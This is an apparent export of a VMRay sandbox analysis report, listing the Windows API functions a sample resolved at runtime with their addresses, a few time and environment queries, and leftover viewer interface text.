Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x76c34620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x76c5d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x76c35929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x76c359e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x76c3183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x76c5828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FatalAppExitA, address_out = 0x76cb4691 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x76c4cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x76c4174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x76c35558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x76c5d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x76c33c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x76c4ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x76c33da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesW, address_out = 0x76cb425f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatW, address_out = 0x76c534d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatW, address_out = 0x76c4f481 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringW, address_out = 0x76c33bca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEndOfFile, address_out = 0x76c4ce2e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadConsoleW, address_out = 0x76cd739a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OutputDebugStringW, address_out = 0x76c5d1d4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleCtrlHandler, address_out = 0x76c38a09 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AreFileApisANSI, address_out = 0x76cb40d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThread, address_out = 0x76c317ec True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableA, address_out = 0x76c3e331 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = IsWindow, address_out = 0x74f57136 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageW, address_out = 0x74f605ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostThreadMessageW, address_out = 0x74f58bff True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxW, address_out = 0x74fafd3f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = QueryServiceStatus, address_out = 0x74d52a86 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CloseServiceHandle, address_out = 0x74d5369c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetPathFromIDListW, address_out = 0x760617bf True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetSpecialFolderLocation, address_out = 0x7605e141 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteA, address_out = 0x76217078 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitialize, address_out = 0x755fb636 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoInitializeSecurity, address_out = 0x75607259 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoUninitialize, address_out = 0x756286d3 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x7522fd6b True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74b59263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74a9572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a8436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
System (5)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-05-13 17:23:06 (UTC) True 1
Fn
Get Time type = Ticks, time = 166609 True 1
Fn
Get Time type = Performance Ctr, time = 23390825524 True 1
Fn
Get Time type = System Time, time = 2019-05-13 17:23:12 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 24120356258 True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image